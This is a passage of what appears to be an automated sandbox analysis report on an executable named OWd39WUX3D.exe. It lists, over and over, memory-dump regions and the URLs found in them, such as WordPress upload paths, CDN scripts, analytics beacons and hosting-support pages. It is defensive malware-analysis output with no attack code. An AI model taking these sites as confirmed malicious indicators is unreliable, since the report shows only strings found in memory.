              Source: OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.587509514.0000000000A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481925757.0000000003530000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.584494342.0000000003B10000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://pohlfood.com/wp-content/uploads/elementor/thumbs/in-q1jbnt182ik6r96y1xqb04n1y55vi627ix9trmwf
              Source: OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.587509514.0000000000A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481925757.0000000003530000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.584494342.0000000003B10000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://pohlfood.com/wp-content/uploads/iStock-1031193710b.jpg
              Source: OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.587509514.0000000000A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481925757.0000000003530000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.584494342.0000000003B10000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://pohlfood.com/wp-content/uploads/iStock-1163123914b.jpg
              Source: OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.587509514.0000000000A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481925757.0000000003530000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.584494342.0000000003B10000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://pohlfood.com/wp-content/uploads/iStock-516652802b.jpg
              Source: OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.587509514.0000000000A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481925757.0000000003530000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.584494342.0000000003B10000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://pohlfood.com/wp-content/uploads/iStock-926365420b.jpg
              Source: OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.587509514.0000000000A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481925757.0000000003530000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.584494342.0000000003B10000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://pohlfood.com/wp-content/uploads/monthlyspec.png
              Source: OWd39WUX3D.exe, 00000000.00000003.584494342.0000000003B10000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://pohlfood.com/wp-content/uploads/pohl-14.jpg
              Source: OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.587509514.0000000000A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.482722234.0000000006B32000.00000004.00000020.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481925757.0000000003530000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.584494342.0000000003B10000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://pohlfood.com/wp-json/
              Source: OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.587509514.0000000000A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481925757.0000000003530000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.584494342.0000000003B10000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://pohlfood.com/wp-json/oembed/1.0/embed?url=https%3A%2F%2Fpohlfood.com%2F
              Source: OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.587509514.0000000000A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481925757.0000000003530000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.584494342.0000000003B10000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://pohlfood.com/wp-json/oembed/1.0/embed?url=https%3A%2F%2Fpohlfood.com%2F&format=xml
              Source: OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.587509514.0000000000A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.482722234.0000000006B32000.00000004.00000020.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481925757.0000000003530000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.584494342.0000000003B10000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://pohlfood.com/wp-json/wp/v2/pages/158
              Source: OWd39WUX3D.exe, 00000000.00000003.493545955.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.495708702.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.613983406.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492582677.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498907657.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391151091.0000000002E60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.608254819.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.587509514.0000000000A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.610092918.0000000002D60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492299587.0000000000BD0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.392317371.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.390418253.0000000005100000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.584404616.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.453116288.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.496225070.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.493585779.0000000006D30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://s.rankmath.com/home
              Source: OWd39WUX3D.exe, 00000000.00000003.423323180.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.383105227.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.602638965.0000000003C70000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://schema.org
              Source: OWd39WUX3D.exe, 00000000.00000003.493545955.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.495708702.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.613983406.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492582677.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605622373.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606432252.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600057998.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489317342.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606278367.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489091593.0000000003690000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605268659.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.601555635.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600719355.0000000004070000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498907657.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.488845793.0000000003D10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391151091.0000000002E60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://sekcija-simer.gzs.si/vsebina/O-sekciji-SiMER
              Source: OWd39WUX3D.exe, 00000000.00000003.493545955.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.495708702.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.613983406.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492582677.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605622373.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606432252.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600057998.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489317342.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606278367.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489091593.0000000003690000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605268659.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.601555635.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600719355.0000000004070000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498907657.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.488845793.0000000003D10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.587509514.0000000000A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.610092918.0000000002D60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://sjbs.org/
              Source: OWd39WUX3D.exe, 00000000.00000003.613983406.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391151091.0000000002E60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.587509514.0000000000A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.610092918.0000000002D60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.392317371.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.584404616.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.453116288.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.433507838.00000000043C0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.557451003.0000000003550000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.390445510.0000000006D30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391710868.0000000004610000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.613011960.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.500705598.0000000004D10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.427101284.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.420833626.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481925757.0000000003530000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://sp0.baidu.com/9_Q4simg2RQJ8t7jm9iCKT-xh_/s.gif
              Source: OWd39WUX3D.exe, 00000000.00000003.493545955.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.495708702.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.613983406.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.616238482.0000000003F10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492582677.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605622373.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606432252.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600057998.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489317342.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606278367.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489091593.0000000003690000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605268659.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.601555635.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600719355.0000000004070000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498907657.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.488845793.0000000003D10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391151091.0000000002E60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://stackpath.bootstrapcdn.com/bootstrap/4.3.1/css/bootstrap.min.css?ver=1.0.0
              Source: OWd39WUX3D.exe, 00000000.00000003.493545955.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.495708702.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.613983406.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492582677.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605622373.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606432252.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600057998.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489317342.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606278367.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489091593.0000000003690000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605268659.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.601555635.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600719355.0000000004070000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498907657.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.488845793.0000000003D10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391151091.0000000002E60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://stackpath.bootstrapcdn.com/bootstrap/4.3.1/js/bootstrap.min.js?ver=1.0.0
              Source: OWd39WUX3D.exe, 00000000.00000003.493545955.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.495708702.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.592879223.0000000000C40000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.613983406.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492582677.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605622373.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606432252.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.485425382.0000000002E20000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600057998.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489317342.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606278367.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.376721219.0000000006C30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.381685715.00000000032A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489091593.0000000003690000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605268659.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.601555635.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600719355.0000000004070000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://static.minne.com/files/banner/minne_600x500
              Source: OWd39WUX3D.exe, 00000000.00000003.493545955.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.495708702.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.613983406.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.616238482.0000000003F10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492582677.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605622373.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606432252.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600057998.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489317342.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606278367.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489091593.0000000003690000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605268659.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.601555635.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600719355.0000000004070000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498907657.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.488845793.0000000003D10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391151091.0000000002E60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://stats.wp.com/w.js?ver=202337
              Source: OWd39WUX3D.exe, 00000000.00000003.493545955.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.495708702.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.592879223.0000000000C40000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.613983406.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492582677.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605622373.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606432252.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.485425382.0000000002E20000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600057998.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489317342.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606278367.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.376721219.0000000006C30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.381685715.00000000032A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489091593.0000000003690000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605268659.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.601555635.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600719355.0000000004070000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://support.lolipop.jp/hc/ja/articles/360049132953
              Source: OWd39WUX3D.exe, 00000000.00000003.493545955.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.495708702.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.613983406.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492582677.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605622373.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606432252.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600057998.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489317342.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606278367.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.381685715.00000000032A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489091593.0000000003690000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605268659.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.601555635.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600719355.0000000004070000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498907657.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.488845793.0000000003D10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.595489063.0000000006E30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://tickets.suresupport.com/faq/article-1596/en
